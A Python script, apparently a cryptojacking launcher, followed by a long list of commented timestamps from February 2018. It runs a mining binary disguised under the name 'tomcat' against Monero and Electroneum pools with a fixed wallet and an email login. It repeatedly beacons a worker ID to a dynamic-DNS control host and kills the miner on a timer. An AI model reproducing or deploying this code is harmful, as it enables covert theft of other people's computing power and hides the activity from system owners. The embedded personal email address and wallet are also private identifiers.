import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:59:05.014647
#2018-02-17 16:47:02.085544
#2018-02-17 18:34:04.158339
#2018-02-17 20:22:05.131601
#2018-02-17 22:09:03.739682
#2018-02-17 23:53:01.184376
#2018-02-18 01:42:04.835465
#2018-02-18 03:28:07.276841
#2018-02-18 05:16:04.506265
#2018-02-18 07:08:02.071970
#2018-02-18 08:56:06.185024
#2018-02-18 10:43:06.805734
#2018-02-18 12:29:02.182986
#2018-02-18 14:17:01.900145
#2018-02-18 16:07:06.567849
#2018-02-18 17:55:06.344521
#2018-02-18 19:42:01.863314
#2018-02-18 21:26:07.109827
#2018-02-18 23:15:01.615107
#2018-02-19 01:01:07.045163
#2018-02-19 02:49:07.146615
#2018-02-19 04:37:04.055077
#2018-02-19 06:21:07.496878
#2018-02-19 08:09:06.507607
#2018-02-19 09:59:02.142479
#2018-02-19 11:48:05.536550
#2018-02-19 13:33:07.713652
#2018-02-19 15:22:06.620139
#2018-02-19 17:12:05.112319
#2018-02-19 19:01:09.766460
#2018-02-19 20:46:05.711158
#2018-02-19 22:34:05.375777
#2018-02-20 00:19:05.883265
#2018-02-20 02:06:07.801775
#2018-02-20 03:56:01.275403
#2018-02-20 05:39:08.380698
#2018-02-20 07:24:01.928797
#2018-02-20 09:09:07.556835
#2018-02-20 10:52:04.943792
#2018-02-20 12:41:05.620427
#2018-02-20 14:26:01.556008
#2018-02-20 16:10:11.216299
#2018-02-20 17:55:08.612429
#2018-02-20 19:46:07.910926
#2018-02-20 21:36:04.273249
#2018-02-20 23:17:06.540686
#2018-02-21 01:00:10.815560
#2018-02-21 02:47:07.535797
#2018-02-21 04:36:06.664508
#2018-02-21 06:24:01.883306
#2018-02-21 08:09:01.582310
#2018-02-21 09:56:01.874107
#2018-02-21 11:45:01.828625
#2018-02-21 13:34:07.103084
#2018-02-21 15:19:07.527553
#2018-02-21 17:10:10.414578
#2018-02-21 18:59:02.204613
#2018-02-21 20:49:01.855876
#2018-02-21 22:36:04.536516
#2018-02-22 00:25:05.857935
#2018-02-22 02:14:04.430369
#2018-02-22 04:01:06.140396
#2018-02-22 05:47:01.542823
#2018-02-22 07:34:07.622178
#2018-02-22 09:24:07.540151
#2018-02-22 11:10:07.688599
#2018-02-22 12:59:08.757802
#2018-02-22 14:47:04.946600
#2018-02-22 16:33:07.231133
#2018-02-22 18:18:12.580569
#2018-02-22 20:11:05.105204
#2018-02-22 21:58:07.374683
#2018-02-22 23:45:08.837012
#2018-02-23 01:32:07.858050
#2018-02-23 03:18:01.358168
#2018-02-23 05:05:01.352523
#2018-02-23 06:49:05.865042
#2018-02-23 08:40:04.170477
#2018-02-23 10:56:01.851968
#2018-02-23 12:52:06.696818
#2018-02-23 14:37:05.788026
#2018-02-23 16:27:06.074923
#2018-02-23 18:15:06.919510
#2018-02-23 20:00:10.542630
#2018-02-23 21:45:10.237756
#2018-02-23 23:37:06.575007
#2018-02-24 01:26:05.637578
#2018-02-24 03:17:03.445269
#2018-02-24 05:02:08.120617
#2018-02-24 06:52:04.644411
#2018-02-24 08:42:05.009113
#2018-02-24 10:27:01.633121
#2018-02-24 12:22:03.494018
#2018-02-24 14:16:05.475277
#2018-02-24 16:02:01.536810
#2018-02-24 17:53:07.290544
#2018-02-24 19:40:08.972645
#2018-02-24 21:27:07.793693
#2018-02-25 00:11:01.554042
#2018-02-25 03:21:05.887386
#2018-02-25 07:09:06.350992